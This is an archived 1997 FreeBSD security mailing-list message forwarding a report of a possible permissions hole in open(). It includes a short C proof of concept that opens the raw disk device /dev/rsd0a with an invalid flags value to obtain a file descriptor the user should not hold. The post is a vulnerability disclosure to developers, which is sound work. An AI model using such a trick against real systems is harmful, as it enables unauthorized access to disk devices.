From owner-freebsd-security Wed Oct 22 22:01:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id WAA28717 for security-outgoing; Wed, 22 Oct 1997 22:01:03 -0700 (PDT) (envelope-from owner-freebsd-security) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id WAA28712 for ; Wed, 22 Oct 1997 22:01:02 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: by burka.rdy.com id WAA11569; (8.8.7/RDY) Wed, 22 Oct 1997 22:00:53 -0700 (PDT) Message-Id: <199710230500.WAA11569@burka.rdy.com> Subject: BoS: Possible SERIOUS bug in open()? (fwd) To: security@freebsd.org Date: Wed, 22 Oct 1997 22:00:52 -0700 (PDT) X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk ----- Forwarded message from explorer@flame.org ----- >From burka.rdy.com!cyber.com.au!best-of-security-request Wed Oct 22 20:45:55 1997 Received: from flea.best.net by burka.rdy.com with ESMTP id UAA11248; (8.8.7/RDY) Wed, 22 Oct 1997 20:45:48 -0700 (PDT) Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24]) by flea.best.net (8.8.7/8.7.3) with ESMTP id UAA24740; Wed, 22 Oct 1997 20:44:57 -0700 (PDT) Received: (from slist@localhost) by plum.cyber.com.au (8.8.6/8.8.6) id MAA22418; Thu, 23 Oct 1997 12:13:42 +1000 (EST) Resent-Date: Thu, 23 Oct 1997 12:13:42 +1000 (EST) Date: 17 Oct 1997 10:42:13 -0000 Message-ID: <19971017104213.11040.qmail@kechara.flame.org> From: explorer@flame.org Sender: darrenr@cyber.com.au Old-Status: O Old-X-Originally-To: To: developers@NetBSD.ORG Old-X-Originated-From: From: explorer@flame.org Resent-Message-ID: <"4heHGD.A.NVC.gSjT0"@plum> X-Loop: best-of-security@cyber.com.au Errors-To: best-of-security-request@cyber.com.au Precedence: list Resent-Sender: best-of-security-request@cyber.com.au To: best-of-security@cyber.com.au Resent-From: best-of-security@cyber.com.au X-Mailing-List: ftp://ftp.cyber.com.au/pub/archive/b-o-s/ X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request@cyber.com.au with Subject: unsubscribe Subject: BoS: Possible SERIOUS bug in open()? This was sent to me recently... It seems to be a pretty serious hole in open() and permissions... Note, in the following, open() succeeds, and ioctls are probably executed... /* * This will give you a file descriptor on a device you should not have * access to. This seems really, really screwed up, since holding a fd * lets you do a lot of ioctls that you should not be able to do... */ #include #include #include #include int main(int argc, char **argv) { int fd; fd = open("/dev/rsd0a", -1, 0); if (fd < 0) err(1, "open"); } ----- End of forwarded message from explorer@flame.org ----- -- dima